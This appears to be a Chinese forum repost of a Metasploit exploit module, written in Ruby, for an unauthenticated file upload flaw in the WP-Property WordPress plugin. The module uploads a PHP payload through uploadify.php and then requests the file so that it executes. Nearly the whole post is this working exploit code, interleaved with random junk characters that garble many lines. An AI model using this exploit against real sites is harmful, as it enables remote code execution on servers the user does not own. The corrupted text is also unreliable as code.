WordPress WP-Property PHP 文件上传漏洞% R q- U4 U& n& O' |2 X
2 W, t! t% t4 D0 t7 a/ I8 [; t) G4 S
## # This file is part of the Metasploit Framework and may be subject to
8 ]% |* V2 U! f0 ~2 }' J1 j5 I
$ Q8 r! K9 ?8 l/ B# redistribution and commercial restrictions. Please see the Metasploit
7 L1 V" b1 v8 G8 u2 ?$ K5 M5 g0 k/ ]
# Framework web site for more information on licensing and terms of use.
* j8 y, P1 o. Y; p9 @# |# W9 t8 Z3 g+ z" T" c9 q
# http://metasploit.com/framework/ ##1 s% @4 s9 s; A9 {( m
( b! I9 l# H/ Z. g, L/ S & }" X6 p1 ~) x) T: w$ t* W
2 e1 X2 v- }5 J, q* x
# b7 D5 }7 S, ^# K7 r! C3 Y: x* O# p/ `4 K; F, N: E* J; q
require 'msf/core'& N# n9 |* Y3 ?' a% H
require 'msf/core/exploit/php_exe'+ ^! B! F5 Y" m G
4 S5 @, C/ Z$ t
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
- S/ _- r7 T! g4 ]1 M'Description' => %q{
% Y, d$ P* e" KThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
& M |% W3 O7 H# \# t; T8 y[/ p" Z. \: o( W3 E% F
'Sammy FORGIT', # initial discovery
% A* H* J- d- c1 T- X, X'James Fitts <fitts.james[at]gmail.com>' # metasploit module
. x9 O1 h( k/ f& x],3 O n7 R) s b- q
'License' => MSF_LICENSE,
) |- o1 l0 X; f- ]'References' =>- b4 [/ O3 k" l3 L9 |- u/ p
[
; \/ ^5 `3 S; h) x. q[ 'OSVDB', '82656' ],' D$ \, h0 k( E9 E' c; ]0 p
[ 'BID', '53787' ],! U1 O* I( d& F" S( Y* P
[ 'EDB', '18987'], e& @1 X+ W- i; y' [
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
/ C! m0 t' U( @% U& i% f],7 V8 L) r6 {2 r; d4 `
'Payload' =># g$ F$ u% o! e2 w0 H- k
{& w }3 q s' d( Y9 K, T* k
'BadChars' => "\x00",) S. {, ~9 g( r4 v5 G
},
" I2 D% A* o3 t8 B'Platform' => 'php',3 {5 Y3 c4 ~1 ? m1 y9 O0 Y t
'Arch' => ARCH_PHP,
# X/ I, g: g3 l7 i'Targets' =>
" ^) {9 [& A7 d) y3 k7 C[
: v5 [$ e4 O" Y3 w[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
6 a5 Z. P; ~3 H" I' k5 B! P2 @[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
) M. ?7 A* I2 U1 E' m) G4 R], A* _! Z- k* D
'DefaultTarget' => 0,
7 S# Q3 Z8 T- s3 [' z'DisclosureDate' => 'Mar 26 2012')): @0 z2 I0 Q7 ?5 S- y( G
u# `3 K: D' V5 l4 x# J5 {/ a' t" H+ z
register_options(( o- F( A; m* e3 \4 W* C9 ^3 _
[
1 y3 Z4 u) B3 F' O9 iOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])3 S# G2 I0 r+ g$ O- F7 V$ b
], self.class)
2 _$ A7 j6 x6 s0 e9 Dend
" A2 ]' T) j5 \- X; C0 j# G9 N. x8 L6 N, q9 L
def check
: f) T' u* P' ?7 r3 k8 juri = target_uri.path
5 o" C* W6 Q' g0 a2 j, ?! |# muri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',+ [$ O% `& l8 C& ^6 D4 T
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
7 j9 f3 z M6 g# |: F& V7 \4 P})
0 m; W8 z' N3 M$ D
7 e' D% Q; v& `0 M- Oif not res or res.code != 200
$ M! X8 t; X# Y" |+ y D# d9 \: Sreturn Exploit::CheckCode::Unknown# z" A2 |& i1 s7 e1 p
end f; {6 `2 }4 x/ `% m! [3 s
& ^' P8 ?. C! e# } t P# `( n# J
return Exploit::CheckCode::Appears
/ h. e/ T+ O0 q$ O1 j4 R0 tend
, K( H0 c: M B! w. A; t
, |6 q5 p- } U) d1 @2 jdef exploit" K& q' ~4 g8 k1 s, N+ u: l6 @
uri = target_uri.path
7 g3 k# R9 \! ? Turi << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)2 Q+ t; O, ^; }7 C5 M% q! Q
+ w6 O6 e0 ?% g1 o; f5 P5 kdata = Rex::MIME::Message.new0 y8 s# l" M- v- q/ A4 T
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")+ P0 H( t2 C& U% m0 T: ^
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")% X1 \, F8 P) i* \7 I: J4 N7 {
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')8 {2 k# v) f1 Q& L' m2 ~1 c' y p
7 q# R( F' j9 S3 ?+ i
print_status("#{peer} - Uploading payload #{@payload_name}")8 l1 G( J( I+ C5 r" d! `
res = send_request_cgi({. v# F7 r1 s& M& l0 |1 e# t* ~* j
'method' => 'POST',
. v) ?8 N/ q3 a7 R N- B'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", K, R9 [+ J# O* c& L3 U
'ctype' => "multipart/form-data; boundary=#{data.bound}",
3 M) x% c9 s; I9 z, a! M) J: c'data' => post_data
/ X; d, e1 B% {1 f* I/ q( P})# T# T( k3 [% Y1 M
" q1 d% e# c2 {' Mif not res or res.code != 200 or res.body !~ /#{@payload_name}/
: N1 _4 h: z% E8 Q% q* m7 afail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
9 t) U/ _- a6 M8 Kend( h4 G* D U! v# I$ u; E8 ]' p, e. |
% S$ Q' X6 c: a+ i# A/ x: mupload_uri = res.body
& B; E6 M7 {9 }8 @: k5 r- M2 J1 [ B; z D) ]) h, t
print_status("#{peer} - Executing payload #{@payload_name}"), W2 r' Y- Q0 V* l3 ~0 d
res = send_request_raw({" h: N$ k8 q/ R, D5 E7 L6 c
'uri' => upload_uri,2 p! {; [+ E' }
'method' => 'GET'6 X/ c8 G# J4 |3 J7 [5 d
})
* D4 F- C/ N. r) ]end. k& ^7 b5 G9 m' t7 p
end, q0 d0 E; ?5 C( h3 H* v8 a1 A
% S8 d3 f- b) K( C2 d不要问我这写的是什么 怎么利用 我是说msf.! {+ r9 H3 ], D, P. F
3 u2 K! o* N6 D- S |